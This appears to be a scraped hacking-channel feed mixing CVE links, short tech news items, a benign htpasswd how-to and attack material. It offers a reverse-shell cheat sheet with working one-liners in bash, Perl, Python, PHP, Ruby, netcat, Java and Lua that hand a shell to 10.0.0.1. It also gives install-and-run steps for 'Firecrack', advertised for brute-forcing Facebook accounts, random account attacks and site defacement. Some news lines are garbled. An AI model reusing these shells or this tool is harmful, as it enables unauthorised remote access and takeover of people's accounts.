🔵Ansible many bugs in win_find may cause unauthorised access :

https://dailycve.com/ansible-many-bugs-winfind-may-cause-unauthorised-access

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Reverse shell method for multiple programming languages:

Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl version: perl -e'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p ,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i" );};

Python version: python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s. fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i "]);'

PHP version: php -r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby version: ruby ​​-rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'

nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp /f
nc xxxx 8888|/bin/sh|nc xxxx 9999

java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/ bin/sh -i <&3 >&3 2>&3');"


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The historical record has been set by U.S. 5 G C-segment spectrum auctions, reaching US$76 billion.
#Analytiques

AMD's desktop CPU share eventually surpasses Intel again after 15 years.
#Analytiques

🔵Multiple CVE in RedHat :

https://dailycve.com/multiple-cve-redhat

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🔥 Firecrack pentest tools: Facebook hacking random attack, deface, admin finder, bing dorking:

1.hack facebook (random attack)
2.bruteforce facebook (one account)
3.admin finder
4.bing dorking
5.deface (file upload)

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Termux:

pkg install python2
pkg install git
git clone https://github.com/Ranginang67/Firecrack
cd Firecrack
pip2 install -r requirements.txt
python2 firecrack.py

help
Linux:

apt-get install python
apt-get install python-pip
apt-get install git
git clone https://github.com/Ranginang67/Firecrack
cd Firecrack
pip install -r requirements.txt
python firecrack.py

help
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🔵WebSphere Application Server- CVE-2020-4329 CVE-2019-10086 :

https://dailycve.com/websphere-application-server-cve-2020-4329-cve-2019-10086

A national e-mail was introduced in Belarus today.
#Updates

Apple is creating a GaN charger that is smaller and simpler, but not for the iPhone.
#Technologies

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACKING PRACTICAL TUTORIALS :

Mid-Course Capstone
Cracking Hashes with Hashcat: https://youtu.be/eq097dEB8Sw

Introduction to Exploit Development (Buffer Overflows)
Immunity Debugger: https://www.immunityinc.com/products/debugger/

Vulnserver: http://www.thegreycorner.com/p/vulnserver.html

Attacking Active Directory: Initial Attack Vectors
mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/

Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

Attacking Active Directory: Post-Compromise Attacks
Group Policy Pwnage: https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/

Mimikatz: https://github.com/gentilkiwi/mimikatz

Active Directory Security Blog: https://adsecurity.org/

Harmj0y Blog: http://blog.harmj0y.net/

Pentester Academy Active Directory: https://www.pentesteracademy.com/activedirectorylab

Pentester Academy Red Team Labs: https://www.pentesteracademy.com/redteamlab

eLS PTX: https://www.elearnsecurity.com/course/penetration_testing_extreme/

(from git)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🔵FFmpeg CVE-2020-35964 :

https://dailycve.com/ffmpeg-cve-2020-35964

Gitlab plans for 2021.
#Updates

Update 27.20.100.9126 of the Intel graphics driver launches and addresses errors in 10th and 11th generation nuclear displays.
#Updates

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to create a password for basic authentication of HTTP users ?

Install the apache2-utils package.

$ sudo apt install apache2-utils
Let's create an empty file to hold the HTTP account information.

$ sudo touch /etc/nginx/snippets/statistics.htpasswd
You can use htpasswd to create a file to store your HTTP account information, but I am opposed as this solution is error prone.

Let's display the encrypted password for user username on standard output.

$ echo "password" | htpasswd -i -n username
username: $ apr1 $ Qzu3mckE $ xiu7cvijFfWTqha / AEQhE1
Add or update your HTTP account information.

$ echo "stats" | sudo htpasswd -i /etc/nginx/snippets/statistics.htpasswd stats
Adding password for user stats

$ echo "stats-" | sudo htpasswd -i /etc/nginx/snippets/statistics.htpasswd stats
Updating password for user stats
Let's check the password for a specific HTTP user.

$ echo "stats-" | sudo htpasswd -i -v /etc/nginx/snippets/statistics.htpasswd stats
Password for user stats correct.

$ echo "stats" | sudo htpasswd -i -v /etc/nginx/snippets/statistics.htpasswd stats
password verification failed
Remove a specific HTTP user.

$ sudo htpasswd -D /etc/nginx/snippets/statistics.htpasswd stats
Deleting password for user stats

$ sudo htpasswd -D /etc/nginx/snippets/statistics.htpasswd stats
User stats not found
Rewrite HTTP account information. You end up with one HTTP account.

$ echo "stats" | sudo htpasswd -i -c /etc/nginx/snippets/statistics.htpasswd stats
Adding password for user stats

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Fresh trick from Google: sit! Swipe TikTok on Google.
#Updates

500,000 employee passwords, trading on the dark web of popular game companies.
#Leaks

Join our new channels:

T.me/UndercodeUpdates

for Chat T.me/UndercodeChats

🔵Windows ipv6 stack CVE-2020-16898 :

https://dailycve.com/windows-ipv6-stack-cve-2020-16898